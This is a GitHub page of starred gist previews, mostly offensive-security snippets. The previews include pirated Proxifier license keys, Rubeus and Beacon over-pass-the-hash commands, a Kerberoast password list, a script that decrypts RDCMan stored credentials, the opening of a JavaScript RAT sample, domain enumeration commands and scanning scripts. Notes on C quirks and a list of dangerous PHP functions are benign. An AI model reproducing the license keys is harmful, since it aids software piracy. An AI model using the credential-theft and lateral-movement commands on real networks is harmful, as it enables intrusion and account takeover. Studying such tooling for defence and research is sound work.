Skip to content

Instantly share code, notes, and snippets.

View vforvasilis's full-sized avatar

vforvasilis

65 followers · 305 following
View GitHub Profile
@f0r34chb3t4
f0r34chb3t4 / keys.txt
Created April 9, 2019 16:42
Proxifier.txt
Portable Version KEYS:
P6Z3T-UYJC9-YAK3F-APN9M-6ZDSD
FGZPK-93CWX-Q33Y6-D5URV-YXC3X
9CZQX-9YAQA-PF33L-XVUQH-NSD48
8RZ3L-H3Y5L-W2RY5-Z5M8N-C7Z2U
CCZNU-LW3LF-K9V2T-MYZFF-94667
EWZM6-3W4UX-KH922-C96GK-VGBH2
Standard Version KEYS:
4AZNW-S2YHE-LLMWM-J6EL8-7QKDL
@PatrikHudak
PatrikHudak / second-order.py
Created December 12, 2018 15:35
Second-order subdomain takeover
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
@edermi
edermi / kerberoast_pws.xz
Last active January 22, 2024 12:40
edermi Kerberoast PW list (XZ format)
This file has been truncated, but you can view the full file.
View raw
@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active September 29, 2024 12:57
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@heiny
heiny / EncryptDecryptRDCMan.ps1
Last active February 18, 2025 06:52
Powershell: Encrypt/Decrypt Remote Desktop Connection Manager Credentials
# There is no facility to replace passwords in RDCMan once they are stored. The only way is to create a new custom credential.
# If you open your *.rdg file in a text editor, locate the stored <password>, you can then decrypt it using this script.
# This script can also encrypt a plain text password in rdg format which can be used to overwrite an existing one in the xml.
Add-Type -AssemblyName System.Security;
Function EncryptPassword {
[CmdletBinding()]
param([String]$PlainText = $null)
# convert to RDCMan format: (null terminated chars)
@fay59
fay59 / Quirks of C.md
Last active August 7, 2025 21:19
Quirks of C

Here's a list of mildly interesting things about the C language that I learned mostly by consuming Clang's ASTs. Although surprises are getting sparser, I might continue to update this document over time.

There are many more mildly interesting features of C++, but the language is literally known for being weird, whereas C is usually considered smaller and simpler, so this is (almost) only about C.

1. Combined type and variable/field declaration, inside a struct scope [https://godbolt.org/g/Rh94Go]

struct foo {
   struct bar {
 int x;
@mccabe615
mccabe615 / phpdangerousfuncs.md
Last active September 20, 2025 11:00
Dangerous PHP Functions

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
@JohnLaTwC
JohnLaTwC / JavaScript RAT
Created February 9, 2018 17:05
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
@its-a-feature
its-a-feature / Domain Enumeration Commands
Created January 7, 2018 21:03
Common Domain Enumeration commands in Windows, Mac, and LDAP
Domain: TEST.local
User Enumeration:
Windows:
net user
net user /domain
net user [username]
net user [username] /domain
wmic useraccount
Mac:
dscl . ls /Users
@cynicXer
cynicXer / masscan_to_nmap.py
Created December 8, 2017 21:40
Parse a masscan output and run an nmap scan on it
#!/usr/bin/python
#
# import masscan output and run an nmap scan on the results
#
import sys
import argparse
from libnmap.parser import NmapParser, NmapParserException
from libnmap.process import NmapProcess